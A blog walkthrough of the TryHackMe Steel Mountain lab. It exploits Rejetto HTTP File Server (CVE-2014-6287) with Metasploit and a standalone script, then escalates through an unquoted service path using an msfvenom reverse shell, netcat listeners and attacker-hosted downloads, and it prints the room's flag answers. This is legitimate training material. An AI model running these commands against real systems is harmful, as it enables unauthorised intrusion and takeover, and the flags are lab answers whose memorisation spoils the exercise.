TryHackMe: Steel Mountain— Walkthrough

December 19, 2024
Posted in CTF, TryHackMe
December 19, 2024 Jasper

Welcome! It is time to look at the final CTF-like room on the Complete Beginner path of THM. This room is called Steel Mountain and I am exited to look at it since it is a Windows machine which has not been covered so much. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Steel Mountain

Steel Mountain CTF

Room URL: https://tryhackme.com/room/steelmountain


Task 1 (Introduction)

In this Steel Mountain room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

Questions

Deploy the machine. Who is the employee of the month?

As always, start with some nmap port scanning. I use the following command for this:

nmap -sV -sC -oN nmap.out -p- <target ip>

This provides version scanning, runs some basic scripts, scans all the ports, and writes the output to a file called nmap.out. We get the following results:

Nmap results showing open ports and services

And more:

Host script results

There is a bunch of interesting stuff here. We have a website running on port 80, RPC, SMB using port 139 and 445) and then some more HTTP related services on 5985, 8080 and 47001. Finally, there is the SSL service running on 3389, which encrypts RDP sessions.

Let’s have a look at the website first! Visit the ip address on port 80.

Home page showing employee of the month

Hmm, the employee of the month. But what about his name?

Let’s have a look at the source code:

Home page source code

The image is called BillHarper.png so I am going to guess that’s his name! 😉

Answer: Bill Harper


Task 2 (Initial Access)

Now you have deployed the machine, lets get an initial shell!

Questions

Scan the machine with nmap. What is the other port running a web server on?

Well, we already port scanned in the previous section so we can start answer these questions 🙂

From our nmap scan we can see that there is also a HTTP FileServer (version 2.3) running on port 8080:

HTTP FileServer running on port 8080

Answer: 8080

Take a look at the other web server. What file server is running?

On the above screenshot we can find the following:

Server information

HttpFileServer is not the answer though. Let’s click on that link:

Rejetto web page

The developer is called Rejetto, and after some trial and error I figured out the answer.

Answer: Rejetto HTTP File Server.

What is the CVE number to exploit this file server?

We know the name of the file version, and that it is running version 2.3. We can therefore use the searchsploit command (or look at exploitdb’s website). I entered the following command:

searchsploit http file server -w

This gave me the following results. Note I used the -w flag to get a link to exploit-db.

Searching for HTTP File Server exploits

Of you look carefully you can see that there are are at least two exploits for version 2.3.x. Let’s try the Remote Command Execution (1) at the following link:

On this page it mentions a CVE number, which is correct!

Answer: 2014–6287

Use Metasploit to get an initial shell. What is the user flag?

Startup Metasploit by running msfconsole.

The great thing about Metasploit is that we can search on CVE number. Let’s do this by running:

search 2014–6287
Searching for the Metasploit exploit module

We can follow this by entering use 0. This select the module.

To see the different options we need to adjust we can run show options.

Showing module options

A lot of this is already set to defaults, so the only options we have to set are RHOSTS, which means the target host ip address, and RPORT. You can set it using set RHOSTS <ip>.

Now all we need to do is enter run or exploit.

We got access to a meterpreter shell:

Gaining a meterpreter shell

Now we need to find the user flag.

We can use the following command to search for all txt files:

search -f *.txt

This gives us the following result:

Searching for text files

Now all we need to do is read the file.

Reading the flag

Remember too use forward slashes.

Answer: b04763b6fcf51fcd7c13abc7db4fd365


Task 3 (Privilege Escalation)

Now that you have an initial shell on this Windows machine as Bill (enter getuid in the meterpreter shell to see this), we can further enumerate the machine and escalate our privileges to root!

Questions

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.” You can download the script here.

Now you can use the upload command in Metasploit to upload the script. To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

Uploading the PowerUp Powershell script

After doing this you just have to run the PowerUp Powershell script by entering:

. .\PowerUp.ps1

Followed by:

Invoke-AllChecks

This gives a long list with abnormalities:

Listing abnormalities found by PowerUp

Answer: No answer needed

Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

The name is found at the top.

Answer: AdvancedSystemCareService9

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

Now we generated a reverse shell with the name ASCService.exe.

We can now leave the Powershell shell, and use the same upload command as before:

Uploading the ASCService reverse shell

No we need to replace the legitimate one. Enter a regular cmd shell from your meterpreter shell by entering: shell.

Before copying, we need to stop the service by entering:

sc stop AdvancedSystemCareService9
Stopping the AdvancedSystemCareService9 service

Then copy the file to the original location:

copy ASCService C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
Copying the ASCService shell to overwrite the original file

Now we need to start a listener!

nc -lvnp 4443

Then restart the program to get a shell as root.

sc start AdvancedSystemCareService9
Starting the AdvancedSystemCareService9 service

And we have system access!

Gaining system access

Answer: No answer needed

What is the root flag?

You can find the root flag on the Administrators Desktop:

Reading the root flag

Answer: 9af5f314f57607c00fd09803a587db80


Task 4 (Access and Escalation Without Metasploit)

Now it is time to use the following exploit without the use of Metasploit:https://www.exploit-db.com/exploits/39161

Questions

To begin we shall be using the same CVE. However, this time let’s use this exploit. *Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Let’s go over the process:

  1. Download the exploit
    Copy the raw text from:
    https://www.exploit-db.com/raw/39161
    and create it into a new file. I called it exploit.py.
  2. Edit the port/ip in the script
    Edit the script and add your attacker machine ip. You can leave the ip as is if you want.
  3. Edit the port number in the script for the file server
    The payload script uses port 80 for the file web server by default. This port is often used on THM AttackBoxes and we can therefore not use it for the web server we run in step 5. We therefore add port 8000 to the ip_addr variable. See image below step 8.
  4. Download a netcat static binary
    Download the netcat binary here:
    https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
    It need to be renamed to nc.exe to work with the exploit script.
  5. Serve the binary by running a Python webserver
    In the directory where you have your binary running start a simple Python web server by running: python3 -m http.server 8000
  6. Start a listener
    Start a simply netcat listener by entering nc -lvnp 443
  7. Run the exploit with the correct arguments
    Run this command: python2 exploit.py 10.10.13.114 8080
    This script will not work without editing with python3.
  8. Run the exploit once more
Editing the exploit script to add “:8000” port

If you have done everything right you have 3 terminal tabs open. One running the exploit, one running the python http server, and one running the netcat listener.

Answer: No answer needed

We received a reverse shell!

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Now download a winPEAS binary (https://github.com/carlospolop/PEASS-ng/releases/tag/20220717) and host the Python server once more. Change directory to bill’s desktop (see below). Then we can execute the following command on the Powershell shell:

powershell -c wget "http://<attacker ip>:8000/winPEAS.exe" -outfile "winPEAS.exe"
Downloading the winPEAS executable to the target machine

Once we run winPeas (simply write winPeas.exe), we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

winPEAS finding the same vulnerability as we saw earlier

We see the same vulnerability as we did when we used Metasploit!

What powershell -c command could we run to manually find out the service name? *Format is “powershell -c “command here”*

Answer: powershell -c Get-Service

Now let’s escalate to Administrator with our new found knowledge. Generate your payload using msfvenom and pull it to the system using powershell.

I am leaving this to you as the process is very similar as when we used Metaspoloit!

Answer: No answer needed

Wow, we are done with Steel Mountain!

Task 3 and task 4 were quite tricky in my opinion, but I have tried to explain the concepts as well as I could. I got a lot more knowledge and I hope you can say the same. Anyway, I’m out! Please send a few claps if you don’t mind 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *